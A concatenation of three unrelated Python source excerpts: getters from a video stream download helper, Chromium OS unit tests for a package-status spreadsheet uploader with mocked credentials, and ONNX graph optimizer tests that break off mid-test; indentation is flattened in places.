# return user chosen format
return self.chosen_format
def get_file_path(self):
# returns the designated file path
return self.file_path
def get_temp_file_path(self):
        # returns the temporary file path used for conversion and trimming
return self.temp_file_path
def get_duration(self):
# return video duration in its standard form
return self.vid.duration
def get_published(self):
# return video publish date
return self.vid.published
def get_allstreamlist(self):
# return all streams available
return self.vid.allstreams
    def get_bestnormal(self, stream_format="any"):
        # return the best audio and video stream
        return self.vid.getbest(preftype=stream_format)
    def get_bestaudio(self, stream_format="any"):
        # return the best audio stream only
        return self.vid.getbestaudio(preftype=stream_format)
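# --- Illustrative usage sketch (not part of the module) ----------------------
# A minimal example of driving Stream_Generator end to end; the URL, times,
# formats and output directory below are hypothetical placeholders.
def _stream_generator_example():  # pragma: no cover
    gen = Stream_Generator(url='https://www.youtube.com/watch?v=EXAMPLE_ID',
                           start_time='00:00:10',
                           end_time='00:01:00',
                           format_type='av',
                           chosen_format='mp4',
                           top_dir='downloads')
    gen.generate()
    if gen.get_errors():
        print(gen.get_errors())
        return None
    print('Stream "%s" will be saved to %s' % (gen.get_title(),
                                               gen.get_file_path()))
    return gen.get_stream()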
|
|
#!/usr/bin/python
# Copyright (c) 2011 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for cros_portage_upgrade.py."""
import exceptions
import mox
from chromite.lib import cros_test_lib
from chromite.lib import gdata_lib
from chromite.lib import osutils
from chromite.lib import table as tablelib
from chromite.scripts import merge_package_status as mps
from chromite.scripts import upload_package_status as ups
# pylint: disable=W0212,R0904,E1120,E1101
class SSEntry(object):
"""Class to simulate one spreadsheet entry."""
def __init__(self, text):
self.text = text
class SSRow(object):
"""Class for simulating spreadsheet row."""
def __init__(self, row, cols=None):
self.custom = {}
if not cols:
# If columns not specified, then column order doesn't matter.
cols = row.keys()
for col in cols:
ss_col = gdata_lib.PrepColNameForSS(col)
val = row[col]
ss_val = gdata_lib.PrepValForSS(val)
self.custom[ss_col] = SSEntry(ss_val)
class SSFeed(object):
"""Class for simulating spreadsheet list feed."""
def __init__(self, rows, cols=None):
self.entry = []
for row in rows:
self.entry.append(SSRow(row, cols))
class UploaderTest(cros_test_lib.MoxOutputTestCase):
"""Test the functionality of upload_package_status.Uploader class."""
COL_PKG = 'Package'
COL_SLOT = 'Slot'
COL_OVERLAY = 'Overlay'
COL_STATUS = 'Status'
COL_VER = 'Current Version'
COL_STABLE_UP = 'Stable Upstream Version'
COL_LATEST_UP = 'Latest Upstream Version'
COL_TARGET = 'Chrome OS Root Target'
SS_COL_PKG = gdata_lib.PrepColNameForSS(COL_PKG)
SS_COL_SLOT = gdata_lib.PrepColNameForSS(COL_SLOT)
SS_COL_OVERLAY = gdata_lib.PrepColNameForSS(COL_OVERLAY)
SS_COL_STATUS = gdata_lib.PrepColNameForSS(COL_STATUS)
SS_COL_VER = gdata_lib.PrepColNameForSS(COL_VER)
SS_COL_STABLE_UP = gdata_lib.PrepColNameForSS(COL_STABLE_UP)
SS_COL_LATEST_UP = gdata_lib.PrepColNameForSS(COL_LATEST_UP)
SS_COL_TARGET = gdata_lib.PrepColNameForSS(COL_TARGET)
COLS = [COL_PKG,
COL_SLOT,
COL_OVERLAY,
COL_STATUS,
COL_VER,
COL_STABLE_UP,
COL_LATEST_UP,
COL_TARGET,
]
ROW0 = {COL_PKG: 'lib/foo',
COL_SLOT: '0',
COL_OVERLAY: 'portage',
COL_STATUS: 'needs upgrade',
COL_VER: '3.0.2',
COL_STABLE_UP: '3.0.9',
COL_LATEST_UP: '3.0.11',
COL_TARGET: 'chromeos',
}
ROW1 = {COL_PKG: 'sys-dev/bar',
COL_SLOT: '0',
COL_OVERLAY: 'chromiumos-overlay',
COL_STATUS: 'needs upgrade',
COL_VER: '1.2.3-r1',
COL_STABLE_UP: '1.2.3-r2',
COL_LATEST_UP: '1.2.4',
COL_TARGET: 'chromeos-dev',
}
ROW2 = {COL_PKG: 'sys-dev/raster',
COL_SLOT: '1',
COL_OVERLAY: 'chromiumos-overlay',
COL_STATUS: 'current',
COL_VER: '1.2.3',
COL_STABLE_UP: '1.2.3',
COL_LATEST_UP: '1.2.4',
COL_TARGET: 'chromeos-test',
}
SS_ROW0 = dict([(gdata_lib.PrepColNameForSS(c), v) for c, v in ROW0.items()])
SS_ROW1 = dict([(gdata_lib.PrepColNameForSS(c), v) for c, v in ROW1.items()])
SS_ROW2 = dict([(gdata_lib.PrepColNameForSS(c), v) for c, v in ROW2.items()])
EMAIL = '[email protected]'
PASSWORD = 'the'
def _MockUploader(self, table=None):
"""Set up a mocked Uploader object."""
uploader = self.mox.CreateMock(ups.Uploader)
if not table:
# Use default table
table = self._CreateDefaultTable()
for slot in ups.Uploader.__slots__:
uploader.__setattr__(slot, None)
uploader._csv_table = table
uploader._scomm = self.mox.CreateMock(gdata_lib.SpreadsheetComm)
uploader._creds = cros_test_lib.EasyAttr(user=self.EMAIL,
password=self.PASSWORD)
uploader._ss_row_cache = self._CreateRowCache(table)
return uploader
def _CreateRowCache(self, table):
"""Recreate the expected row cache (by pkg) from |table|."""
if not table:
return None
row_cache = {}
for rowIx, row in enumerate(table):
pkg = row[self.COL_PKG]
# Translate column names now.
ss_row_dict = {}
for col in row:
ss_row_dict[gdata_lib.PrepColNameForSS(col)] = row[col]
ss_row = gdata_lib.SpreadsheetRow('OrigRow%d' % (rowIx + 2),
rowIx + 2, ss_row_dict)
entry = row_cache.get(pkg)
if not entry:
row_cache[pkg] = ss_row
elif type(entry) == list:
row_cache[pkg] = entry + [ss_row]
else:
row_cache[pkg] = [entry, ss_row]
return row_cache
def _CreateDefaultTable(self):
return self._CreateTableWithRows(self.COLS,
[self.ROW0, self.ROW1])
def _CreateTableWithRows(self, cols, rows):
mytable = tablelib.Table(list(cols))
if rows:
for row in rows:
mytable.AppendRow(dict(row))
return mytable
def testLoadTable(self):
    # Note that this test is not actually for a method of the Uploader class.
self.mox.StubOutWithMock(tablelib.Table, 'LoadFromCSV')
csv = 'any.csv'
# Replay script
tablelib.Table.LoadFromCSV(csv).AndReturn('loaded_table')
self.mox.ReplayAll()
# Verification steps.
with self.OutputCapturer():
loaded_table = ups.LoadTable(csv)
self.assertEquals(loaded_table, 'loaded_table')
def testGetSSRowForPackage(self):
mocked_uploader = self._MockUploader()
# No replay script.
self.mox.ReplayAll()
# Verification steps.
result = ups.Uploader._GetSSRowForPackage(mocked_uploader,
self.ROW0[self.COL_PKG])
self.assertEquals(result, self.SS_ROW0)
self.assertEquals(2, result.ss_row_num)
result = ups.Uploader._GetSSRowForPackage(mocked_uploader,
self.ROW1[self.COL_PKG])
self.assertEquals(result, self.SS_ROW1)
self.assertEquals(3, result.ss_row_num)
result = ups.Uploader._GetSSRowForPackage(mocked_uploader,
self.ROW2[self.COL_PKG])
self.assertEquals(result, None)
self.mox.VerifyAll()
def testUploadFirstWorksheet(self):
mocked_uploader = self._MockUploader()
# Clear ._scomm attribute to simulate uploading first worksheet.
mocked_scomm = mocked_uploader._scomm
mocked_uploader._scomm = None
self.mox.StubOutWithMock(gdata_lib.SpreadsheetComm, '__new__')
ss_key = 'Some ss_key'
ws_name = 'Some ws_name'
# Replay script
gdata_lib.SpreadsheetComm.__new__(gdata_lib.SpreadsheetComm
).AndReturn(mocked_scomm)
mocked_scomm.Connect(mocked_uploader._creds, ss_key, ws_name,
source='Upload Package Status')
mocked_scomm.GetRowCacheByCol(self.SS_COL_PKG).AndReturn('RowCache')
mocked_uploader._UploadChangedRows().AndReturn(tuple([0, 1, 2]))
mocked_uploader._DeleteOldRows().AndReturn(tuple([3, 4]))
self.mox.ReplayAll()
# Verify
with self.OutputCapturer():
ups.Uploader.Upload(mocked_uploader, ss_key, ws_name)
self.mox.VerifyAll()
def testUploadSecondWorksheet(self):
mocked_uploader = self._MockUploader()
ss_key = 'Some ss_key'
ws_name = 'Some ws_name'
# Replay script
mocked_uploader._scomm.SetCurrentWorksheet(ws_name)
mocked_uploader._scomm.GetRowCacheByCol(self.SS_COL_PKG).AndReturn('RCache')
mocked_uploader._UploadChangedRows().AndReturn(tuple([0, 1, 2]))
mocked_uploader._DeleteOldRows().AndReturn(tuple([3, 4]))
self.mox.ReplayAll()
# Verify
with self.OutputCapturer():
ups.Uploader.Upload(mocked_uploader, ss_key, ws_name)
self.mox.VerifyAll()
def testUploadChangedRows(self):
table = self._CreateTableWithRows(self.COLS,
[self.ROW0, self.ROW1, self.ROW2])
mocked_uploader = self._MockUploader(table=table)
def RowVerifier(row_delta, golden_col_set, golden_row):
if golden_col_set != set(row_delta.keys()):
return False
for col in row_delta:
val = row_delta[col]
if val != golden_row[col]:
return False
return True
# First Row.
# Pretend first row does not exist already in online spreadsheet
    # by returning None from _GetSSRowForPackage.
#
row0_pkg = self.ROW0[self.COL_PKG]
mocked_uploader._GetSSRowForPackage(row0_pkg).AndReturn(None)
mocked_uploader._scomm.InsertRow(mox.IgnoreArg())
# Second Row.
# Pretend second row does already exist in online spreadsheet, and
# pretend that it has a different value that needs to be changed
# by an upload.
row1_pkg = self.ROW1[self.COL_PKG]
row1_reverse_delta = { self.SS_COL_VER: '1.2.3' }
ss_row1 = dict(self.SS_ROW1)
for col in row1_reverse_delta:
ss_row1[col] = row1_reverse_delta[col]
ss_row1 = gdata_lib.SpreadsheetRow('OrigRow1', 3, ss_row1)
mocked_uploader._GetSSRowForPackage(row1_pkg).AndReturn(ss_row1)
    # Prepare verification for the row.
g_col_set1 = set(row1_reverse_delta.keys())
g_row1 = gdata_lib.PrepRowForSS(self.SS_ROW1)
row1_verifier = lambda rdelta : RowVerifier(rdelta, g_col_set1, g_row1)
mocked_uploader._scomm.UpdateRowCellByCell(3, mox.Func(row1_verifier))
# Third Row.
# Pretend third row does already exist in online spreadsheet, and
# pretend that several values need to be changed by an upload.
row2_pkg = self.ROW2[self.COL_PKG]
row2_reverse_delta = { self.SS_COL_STATUS: 'needs upgrade',
self.SS_COL_VER: '0.5',
self.SS_COL_TARGET: 'chromeos-foo',
}
ss_row2 = dict(self.SS_ROW2)
for col in row2_reverse_delta:
ss_row2[col] = row2_reverse_delta[col]
ss_row2 = gdata_lib.SpreadsheetRow('OrigRow2', 4, ss_row2)
mocked_uploader._GetSSRowForPackage(row2_pkg).AndReturn(ss_row2)
# Prepare verification for row.
g_col_set2 = set(row2_reverse_delta.keys())
g_row2 = gdata_lib.PrepRowForSS(self.SS_ROW2)
row2_verifier = lambda rdelta : RowVerifier(rdelta, g_col_set2, g_row2)
mocked_uploader._scomm.UpdateRowCellByCell(4, mox.Func(row2_verifier))
self.mox.ReplayAll()
# Verify
with self.OutputCapturer():
ups.Uploader._UploadChangedRows(mocked_uploader)
self.mox.VerifyAll()
def testDeleteOldRows(self):
mocked_uploader = self._MockUploader()
# Pretend spreadsheet has 2 rows, one in table and one not.
ss_row1 = gdata_lib.SpreadsheetRow('OrigRow1', 2, self.SS_ROW1)
ss_row2 = gdata_lib.SpreadsheetRow('OrigRow2', 3, self.SS_ROW2)
ss_rows = (ss_row1, ss_row2)
mocked_uploader._scomm.GetRows().AndReturn(ss_rows)
# We expect ROW2 in spreadsheet to be deleted.
mocked_uploader._scomm.DeleteRow('OrigRow2')
self.mox.ReplayAll()
# Verify
with self.OutputCapturer():
ups.Uploader._DeleteOldRows(mocked_uploader)
self.mox.VerifyAll()
class MainTest(cros_test_lib.MoxOutputTestCase):
"""Test argument handling at the main method level."""
def testHelp(self):
"""Test that --help is functioning"""
with self.OutputCapturer() as output:
# Running with --help should exit with code==0
try:
ups.main(['--help'])
except exceptions.SystemExit, e:
self.assertEquals(e.args[0], 0)
# Verify that a message beginning with "Usage: " was printed
stdout = output.GetStdout()
self.assertTrue(stdout.startswith('Usage: '))
def testMissingCSV(self):
"""Test that running without a csv file argument exits with an error."""
with self.OutputCapturer():
      # Running without a csv file argument should exit with code != 0
try:
ups.main([])
except exceptions.SystemExit, e:
self.assertNotEquals(e.args[0], 0)
self.AssertOutputEndsInError(check_stdout=True)
def testPrepareCredsEmailPassword(self):
email = '[email protected]'
password = 'shh'
creds_file = 'bogus'
token_file = 'boguser'
mocked_creds = self.mox.CreateMock(gdata_lib.Creds)
self.mox.StubOutWithMock(gdata_lib.Creds, '__new__')
gdata_lib.Creds.__new__(gdata_lib.Creds).AndReturn(mocked_creds)
mocked_creds.SetCreds(email, password)
self.mox.ReplayAll()
ups.PrepareCreds(creds_file, token_file, email, password)
self.mox.VerifyAll()
def testMainEmailPassword(self):
"""Verify that running main with email/password follows flow."""
csv = 'any.csv'
email = '[email protected]'
password = '123'
mocked_creds = self.mox.CreateMock(gdata_lib.Creds)
creds_file = 'non-existing-file'
self.mox.StubOutWithMock(ups, 'PrepareCreds')
self.mox.StubOutWithMock(ups, 'LoadTable')
self.mox.StubOutWithMock(mps, 'FinalizeTable')
self.mox.StubOutWithMock(ups.Uploader, 'Upload')
ups.PrepareCreds(creds_file, None, email, password).AndReturn(mocked_creds)
ups.LoadTable(csv).AndReturn('csv_table')
mps.FinalizeTable('csv_table')
ups.Uploader.Upload(mox.IgnoreArg(), ws_name='Packages')
ups.Uploader.Upload(mox.IgnoreArg(), ws_name='Dependencies')
mocked_creds.StoreCredsIfNeeded(creds_file)
self.mox.ReplayAll()
ups.main(['--email=%s' % email,
'--password=%s' % password,
'--cred-file=%s' % creds_file,
csv])
self.mox.VerifyAll()
@osutils.TempFileDecorator
def testMainCredsFile(self):
"""Verify that running main with creds file follows flow."""
csv = 'any.csv'
creds_file = self.tempfile
token_file = 'non-existing-file'
mocked_creds = self.mox.CreateMock(gdata_lib.Creds)
mocked_creds.auth_token_loaded = False
self.mox.StubOutWithMock(ups, 'PrepareCreds')
self.mox.StubOutWithMock(ups, 'LoadTable')
self.mox.StubOutWithMock(mps, 'FinalizeTable')
self.mox.StubOutWithMock(ups.Uploader, 'Upload')
ups.PrepareCreds(creds_file, token_file, None, None).AndReturn(mocked_creds)
ups.LoadTable(csv).AndReturn('csv_table')
mps.FinalizeTable('csv_table')
ups.Uploader.Upload(mox.IgnoreArg(), ws_name=ups.PKGS_WS_NAME)
ups.Uploader.Upload(mox.IgnoreArg(), ws_name=ups.DEPS_WS_NAME)
mocked_creds.StoreCredsIfNeeded(creds_file)
mocked_creds.StoreAuthTokenIfNeeded(token_file)
self.mox.ReplayAll()
ups.main(['--cred-file=%s' % creds_file,
'--auth-token-file=%s' % token_file,
csv])
self.mox.VerifyAll()
@osutils.TempFileDecorator
def testMainTokenFile(self):
"""Verify that running main with token file follows flow."""
csv = 'any.csv'
token_file = self.tempfile
creds_file = 'non-existing-file'
mocked_creds = self.mox.CreateMock(gdata_lib.Creds)
mocked_creds.auth_token_loaded = True
self.mox.StubOutWithMock(ups, 'PrepareCreds')
self.mox.StubOutWithMock(ups, 'LoadTable')
self.mox.StubOutWithMock(mps, 'FinalizeTable')
self.mox.StubOutWithMock(ups.Uploader, 'Upload')
ups.PrepareCreds(creds_file, token_file, None, None).AndReturn(mocked_creds)
ups.LoadTable(csv).AndReturn('csv_table')
mps.FinalizeTable('csv_table')
ups.Uploader.Upload(mox.IgnoreArg(), ws_name=ups.PKGS_WS_NAME)
ups.Uploader.Upload(mox.IgnoreArg(), ws_name=ups.DEPS_WS_NAME)
mocked_creds.StoreCredsIfNeeded(creds_file)
mocked_creds.StoreAuthTokenIfNeeded(token_file)
self.mox.ReplayAll()
ups.main(['--cred-file=%s' % creds_file,
'--auth-token-file=%s' % token_file,
csv])
self.mox.VerifyAll()
if __name__ == '__main__':
cros_test_lib.main()
|
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from onnx import checker, helper, ModelProto, TensorProto, GraphProto, NodeProto
from typing import Sequence, Text, Tuple, List, Callable
from onnx import numpy_helper
import numpy as np # type: ignore
import onnx.optimizer
import unittest
class TestOptimizer(unittest.TestCase):
def _optimized(self, graph, opts): # type: (GraphProto, Sequence[Text]) -> ModelProto
orig_model = helper.make_model(graph, producer_name='onnx-test')
optimized_model = onnx.optimizer.optimize(orig_model, opts)
checker.check_model(optimized_model)
return optimized_model
    # input_types and output_types are lists of triples of (type, shape, name)
def _make_fake_loop_op(self,
body_nodes, # type: Sequence[NodeProto]
input_types, # type: Sequence[Tuple[TensorProto.DataType, Sequence[int], Text]]
output_types # type: Sequence[Tuple[TensorProto.DataType, Sequence[int], Text]]
): # type: (...) -> List[NodeProto]
zero = helper.make_tensor("trip_count_value", TensorProto.INT32, (), [10])
true = helper.make_tensor("condition", TensorProto.BOOL, (), [True])
# lcd is a dummy loop-carried dependency that only exists because
# right now the schema checker is broken and assumes a variadic
# input needs at least one value.
graph_inputs = [helper.make_tensor_value_info("i", TensorProto.INT32, ()),
helper.make_tensor_value_info("cond", TensorProto.BOOL, ())]
for type, shape, name in input_types:
graph_inputs.append(helper.make_tensor_value_info("_" + name, type, shape))
graph_outputs = [helper.make_tensor_value_info("cond", TensorProto.BOOL, ())]
for type, shape, name in output_types:
graph_outputs.append(helper.make_tensor_value_info("_" + name, type, shape))
body_graph = helper.make_graph(body_nodes, "body_graph", graph_inputs,
graph_outputs)
loop_inputs = ["trip_count", "condition"]
loop_inputs.extend([name for _, _, name in input_types])
# TODO: fix checker to accept 0-input variadic inputs
if len(loop_inputs) == 2:
loop_inputs.append("")
loop_outputs = [name for _, _, name in output_types]
retval_nodes = [
helper.make_node("Constant", [], ["trip_count"], value=zero),
helper.make_node("Constant", [], ["condition"], value=true),
helper.make_node("Loop", loop_inputs, loop_outputs, body=body_graph)
]
return retval_nodes
def _make_fake_if_op(self,
true_nodes, # type: Sequence[NodeProto]
false_nodes, # type: Sequence[NodeProto]
output_types # type: Sequence[Tuple[TensorProto.DataType, Sequence[int], Text]]
): # type: (...) -> List[NodeProto]
true = helper.make_tensor("condition", TensorProto.BOOL, (), [True])
true_graph = helper.make_graph(true_nodes, "true_graph", [], [])
false_graph = helper.make_graph(false_nodes, "false_graph", [], [])
if_inputs = ["condition"]
if_outputs = [name for _, _, name in output_types]
retval_nodes = [
helper.make_node("Constant", [], ["condition"], value=true),
helper.make_node("If", if_inputs, if_outputs, then_branch=true_graph,
else_branch=false_graph)
]
return retval_nodes
# fn is a function that takes a single node as argument
def _visit_all_nodes_recursive(self, graph, fn): # type: (GraphProto, Callable[[NodeProto], None]) -> None
for node in graph.node:
fn(node)
for attr in node.attribute:
if attr.g is not None:
self._visit_all_nodes_recursive(attr.g, fn)
if len(attr.graphs):
for gr in attr.graphs:
self._visit_all_nodes_recursive(gr, fn)
def test_get_available_passes(self): # type: () -> None
        # FIXME: this does not guarantee that all available passes are listed
graph = helper.make_graph([], "dummy_graph", [], [])
list_of_passes = onnx.optimizer.get_available_passes()
assert isinstance(list_of_passes, (list)) and len(list_of_passes) > 0
for pass_name in list_of_passes:
# If pass_name is invalid it throws a RuntimeError
self._optimized(graph, [pass_name])
def test_eliminate_identity_single_use(self): # type: () -> None
nodes = [helper.make_node("Identity", ["X"], ["Y"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Identity", ["_Y"], ["_Y2"])],
[(TensorProto.FLOAT, (5,), "Y")],
[(TensorProto.FLOAT, (5,), "Y2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (5,))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (5,)),
helper.make_tensor_value_info("Y2", TensorProto.FLOAT, (5,))])
optimized_model = self._optimized(graph, ["eliminate_identity"])
# All identity nodes should have been eliminated
def check_identity(node): # type: (NodeProto) -> None
assert node.op_type != "Identity"
self._visit_all_nodes_recursive(optimized_model.graph, check_identity)
# Use of the output from the Identity node in the main graph should
# have been replaced with the input to the identity node
assert len(optimized_model.graph.output) == 2
assert optimized_model.graph.output[0].name == "X"
# Use of the output from the Identity node in the loop graph should
# have been replaced with the input to that identity node
assert len(optimized_model.graph.node[2].attribute[0].g.output) == 2
assert optimized_model.graph.node[2].attribute[0].g.output[1].name == "_Y"
def test_eliminate_identity_multiple_uses(self): # type: () -> None
identity = helper.make_node("Identity", ["X"], ["Y"])
add = helper.make_node("Add", ["Z", "Y"], ["A"])
mul = helper.make_node("Mul", ["A", "Y"], ["B"])
graph = helper.make_graph(
[identity, add, mul],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (5,)),
helper.make_tensor_value_info("Z", TensorProto.FLOAT, (5,))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (5,))])
optimized_model = self._optimized(graph, ["eliminate_identity"])
for node in optimized_model.graph.node:
assert node.op_type != "Identity"
assert len(optimized_model.graph.node) == 2
def test_nop_transpose(self): # type: () -> None
nodes = [helper.make_node("Transpose", ["X"], ["Y"], perm=[0, 1])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Transpose", ["_Y"], ["_Y2"], perm=[0, 1])],
[(TensorProto.FLOAT, (2, 3), "Y")],
[(TensorProto.FLOAT, (2, 3), "Y2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (2, 3)),
helper.make_tensor_value_info("Y2", TensorProto.FLOAT, (2, 3))])
optimized_model = self._optimized(graph, ["eliminate_nop_transpose"])
def check_transpose(node): # type: (NodeProto) -> None
assert node.op_type != "Transpose"
self._visit_all_nodes_recursive(optimized_model.graph, check_transpose)
        # Use of the output from the Transpose node in the main graph should
        # have been replaced with the input to the Transpose node
assert len(optimized_model.graph.output) == 2
assert optimized_model.graph.output[0].name == "X"
        # Use of the output from the Transpose node in the loop graph should
        # have been replaced with the input to that Transpose node
assert len(optimized_model.graph.node[2].attribute[0].g.output) == 2
assert optimized_model.graph.node[2].attribute[0].g.output[1].name == "_Y"
def test_nop_transpose_default(self): # type: () -> None
trans = helper.make_node("Transpose", ["X"], ["Y"])
graph = helper.make_graph(
[trans],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2))])
optimized_model = self._optimized(graph, ["eliminate_nop_transpose"])
assert len(list(optimized_model.graph.node)) == 1
assert optimized_model.graph.node[0].op_type == "Transpose"
def test_eliminate_unused_initializer(self): # type: () -> None
add = helper.make_node("Add", ["X", "Y"], ["Z"])
graph = helper.make_graph(
[add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(2, 3),
vals=np.random.randn(2, 3).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
assert len(list(optimized_model.graph.initializer)) == 0
def test_eliminate_unused_initializer_input(self): # type: () -> None
add = helper.make_node("Add", ["X", "Y"], ["Z"])
graph = helper.make_graph(
[add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(2, 3),
vals=np.random.randn(2, 3).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
assert len(list(optimized_model.graph.initializer)) == 0
assert len(optimized_model.graph.input) == 2
def test_eliminate_unused_initializer_no_eliminate_used_default(self): # type: () -> None
add = helper.make_node("Add", ["X", "A"], ["Z"])
graph = helper.make_graph(
[add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(1, 2),
vals=np.random.randn(1, 2).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
assert len(list(optimized_model.graph.initializer)) == 1
def test_eliminate_unused_initializer_no_eliminate_used(self): # type: () -> None
nodes = [helper.make_node("Add", ["X", "A"], ["Z"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Add", ["_X", "_A"], ["_Z2"])],
[(TensorProto.FLOAT, (1, 2), "X"),
(TensorProto.FLOAT, (1, 2), "A")],
[(TensorProto.FLOAT, (1, 2), "Z2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(1, 2),
vals=np.random.randn(1, 2).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
# Add, Constant (trip count), Constant (cond), Loop
assert len(list(optimized_model.graph.node)) == 4
assert optimized_model.graph.node[0].op_type == "Add"
assert optimized_model.graph.output[0].name == "Z"
# Add
assert len(optimized_model.graph.node[3].attribute[0].g.node) == 1
assert optimized_model.graph.node[3].attribute[0].g.node[0].op_type == 'Add'
assert optimized_model.graph.node[3].attribute[0].g.output[1].name == '_Z2'
assert len(list(optimized_model.graph.initializer)) == 1
def test_eliminate_unused_initializer_no_eliminate_output(self): # type: () -> None
add = helper.make_node("Add", ["X", "Y"], ["Z"])
graph = helper.make_graph(
[add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(2, 3),
vals=np.random.randn(2, 3).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
assert len(list(optimized_model.graph.initializer)) == 1
assert "Z" in [o.name for o in optimized_model.graph.output]
def test_extract_constant_to_initializer(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
constant = helper.make_node("Constant", [], ["A"],
value=helper.make_tensor(
name="bias",
data_type=TensorProto.FLOAT,
dims=(16, 1, 1),
vals=np.random.randn(16).astype(np.float32).tolist()))
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, constant, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
)
optimized_model = self._optimized(graph, ["extract_constant_to_initializer"])
self.assertEqual(
set(vi.name for vi in optimized_model.graph.input),
{'X', 'Y', 'A'})
self.assertEqual(len(optimized_model.graph.initializer), 1)
init = optimized_model.graph.initializer[0]
self.assertEqual(init.name, 'A')
self.assertEqual(init.dims, [16, 1, 1])
self.assertEqual(init.data_type, TensorProto.FLOAT)
self.assertEqual([n.op_type for n in optimized_model.graph.node], ['Conv', 'Add'])
def test_fuse_transpose(self): # type: () -> None
nodes = [helper.make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2]),
helper.make_node("Transpose", ["Y"], ["Z"], perm=[2, 0, 1]),
helper.make_node("Transpose", ["Z"], ["A"], perm=[2, 0, 1])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Transpose", ["_X"], ["_Y2"], perm=[1, 0, 2]),
helper.make_node("Transpose", ["_Y2"], ["_Y3"], perm=[2, 0, 1]),
helper.make_node("Transpose", ["_Y3"], ["_Y4"], perm=[2, 0, 1])],
[(TensorProto.FLOAT, (2, 3), "X")],
[(TensorProto.FLOAT, (2, 3), "Y4")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3, 4))],
[helper.make_tensor_value_info("A", TensorProto.FLOAT, (4, 3, 2)),
helper.make_tensor_value_info("Y4", TensorProto.FLOAT, (4, 3, 2))])
optimized_model = self._optimized(graph, ["fuse_consecutive_transposes"])
# Transpose, Constant (trip count), Constant (cond), Loop
assert len(list(optimized_model.graph.node)) == 4
# Transpose
assert len(optimized_model.graph.node[3].attribute[0].g.node) == 1
def test_fuse_transpose_default(self): # type: () -> None
trans1 = helper.make_node("Transpose", ["X"], ["Y"])
trans2 = helper.make_node("Transpose", ["Y"], ["Z"])
graph = helper.make_graph(
[trans1, trans2],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3, 4))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (2, 3, 4))])
optimized_model = self._optimized(graph, ["fuse_consecutive_transposes"])
assert len(list(optimized_model.graph.node)) == 0
def test_fuse_transpose_default_no_fuse(self): # type: () -> None
trans1 = helper.make_node("Transpose", ["X"], ["Y"])
trans2 = helper.make_node("Transpose", ["Y"], ["Z"], perm=[0, 1, 2])
graph = helper.make_graph(
[trans1, trans2],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3, 4))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (4, 3, 2))])
optimized_model = self._optimized(graph, ["fuse_consecutive_transposes"])
assert len(list(optimized_model.graph.node)) == 2
for node in optimized_model.graph.node:
assert node.op_type == "Transpose"
def test_fuse_transpose_into_gemm(self): # type: () -> None
nodes = [helper.make_node("Transpose", ["X"], ["A"], perm=[1, 0]),
